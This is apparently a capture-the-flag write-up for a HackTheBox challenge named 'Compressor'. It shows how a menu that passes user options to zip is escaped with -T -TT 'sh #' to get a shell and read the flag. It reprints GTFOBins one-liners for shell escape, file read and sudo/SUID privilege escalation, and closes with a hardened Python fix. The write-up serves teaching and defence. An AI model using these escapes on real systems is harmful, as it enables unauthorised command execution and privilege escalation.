Compressor
3 minute read
For this challenge we only get a remote instance to connect to:
$ nc 157.245.33.77 31001
[*] Directory to work in: 9wIylX4fBakMNG8u6YfY37k3k1geVXHv
Component List:
+===============+
| |
| 1. Head 🤖 |
| 2. Torso 🦴 |
| 3. Hands 💪 |
| 4. Legs 🦵 |
| |
+===============+
[*] Choose component:
We can pick the first one, for example:
[*] Choose component: 1
[*] Sub-directory to work in: 9wIylX4fBakMNG8u6YfY37k3k1geVXHv/Head
Actions:
1. Create artifact
2. List directory (pwd; ls -la)
3. Read artifact (cat ./<name>)
4. Compress artifact (zip <name>.zip <name> <options>)
5. Change directory (cd <dirname>)
6. Clean directory (rm -rf ./*)
7. Exit
[*] Choose action:
Perfect, we have a few options to work with.
We can see that zip is run as a command and that we get to supply its options. Looking at GTFOBins, we find that a specific parameter can be used to obtain a shell.
You can also use my tool gtfobins-cli
to view the same information from the command line:
$ gtfobins-cli zip
zip ==> https://gtfobins.github.io/gtfobins/zip/
Shell
It can be used to break out from restricted environments by spawning an interactive system shell.
TF=$(mktemp -u)
zip $TF /etc/hosts -T -TT 'sh #'
rm $TF
File read
It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
LFILE=file-to-read
TF=$(mktemp -u)
zip $TF $LFILE
unzip -p $TF
Sudo
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
Limited SUID
If the binary has the SUID bit set, it may be abused to access the file system, escalate or maintain access with elevated privileges working as a SUID backdoor. If it is used to run commands (e.g., via system()-like invocations) it only works on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.
sudo install -m =xs $(which zip) .
TF=$(mktemp -u)
./zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
Great, so we can pass -T -TT 'sh #'
as the options to get a shell. But first we need to create an artifact, because the current working directory is empty:
[*] Choose action: 2
/home/ctf/Rm4gXvPOefWkBXd3VYlOQyrGvLEnwNMm/Head
total 8
drwxr-sr-x 2 ctf ctf 4096 May 19 00:45 .
drwxr-sr-x 6 ctf ctf 4096 May 19 00:45 ..
Actions:
1. Create artifact
2. List directory (pwd; ls -la)
3. Read artifact (cat ./<name>)
4. Compress artifact (zip <name>.zip <name> <options>)
5. Change directory (cd <dirname>)
6. Clean directory (rm -rf ./*)
7. Exit
[*] Choose action: 1
Insert name: asdf
Insert content: asdf
[+] Artifact [asdf] was created successfuly!
Actions:
1. Create artifact
2. List directory (pwd; ls -la)
3. Read artifact (cat ./<name>)
4. Compress artifact (zip <name>.zip <name> <options>)
5. Change directory (cd <dirname>)
6. Clean directory (rm -rf ./*)
7. Exit
[*] Choose action:
And now we can use the GTFOBin to get a shell and grab the flag:
[*] Choose action: 4
Insert <name>.zip: asdf
Insert <name>: asdf
Insert <options>: -T -TT 'sh #'
adding: asdf (stored 0%)
whoami
ctf
cd ..
ls
Hands
Head
Legs
Torso
cd ..
ls
Rm4gXvPOefWkBXd3VYlOQyrGvLEnwNMm
artifacts.py
clear.py
flag.txt
cat flag.txt
HTB{z1pp1ti_z0pp1t1_GTFO_0f_my_pr0p3rty}
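The root cause above is that the menu hands the user-supplied <options> string to zip through a shell, so -TT (zip's "test with this command" switch) becomes a command-execution primitive. Below is an added example of how the "Compress artifact" action could be hardened; it is hypothetical code written for this writeup, not the challenge's own artifacts.py, and the function names and option allowlist are my assumptions.

```python
import re
import subprocess

# Vulnerable pattern seen on the page (shell string, user controls the tail):
#   os.system(f"zip {name}.zip {name} {options}")   # "-T -TT 'sh #'" => shell
# Hardened version: validate the name, allowlist the switches, never use a shell.

# Artifact names: plain file names only, no path separators or shell metacharacters.
ARTIFACT_NAME = re.compile(r"[A-Za-z0-9_.-]{1,64}")

# Harmless compression switches only. -T/-TT, -sf, -@ etc. are deliberately absent:
# anything that makes zip run a program or read paths it was not given is rejected.
ALLOWED_OPTIONS = {f"-{n}" for n in range(10)} | {"-q", "-r", "-j", "-X"}


def split_user_options(raw: str) -> list[str]:
    """Split the raw <options> input on whitespace only (no shlex), so quotes
    cannot smuggle a multi-word argument such as 'sh #' past the allowlist."""
    return raw.split()


def build_zip_argv(name: str, options: list[str]) -> list[str]:
    """Return the argv list for zip, or raise ValueError on unsafe input."""
    if not ARTIFACT_NAME.fullmatch(name) or name.startswith("-"):
        raise ValueError(f"invalid artifact name: {name!r}")
    for opt in options:
        if opt not in ALLOWED_OPTIONS:
            raise ValueError(f"option not allowed: {opt!r}")
    # Options first, then archive and member, matching zip's documented usage.
    return ["zip", *options, f"{name}.zip", name]


def compress_artifact(name: str, raw_options: str) -> subprocess.CompletedProcess:
    """Run zip with an argv list: no shell, no word splitting, no quoting tricks.
    Only what survives build_zip_argv ever reaches the zip binary."""
    argv = build_zip_argv(name, split_user_options(raw_options))
    return subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=30)


if __name__ == "__main__":
    print(build_zip_argv("asdf", split_user_options("-9")))
    for bad in ("-T -TT 'sh #'", "-@"):
        try:
            build_zip_argv("asdf", split_user_options(bad))
        except ValueError as exc:
            print("rejected:", exc)
```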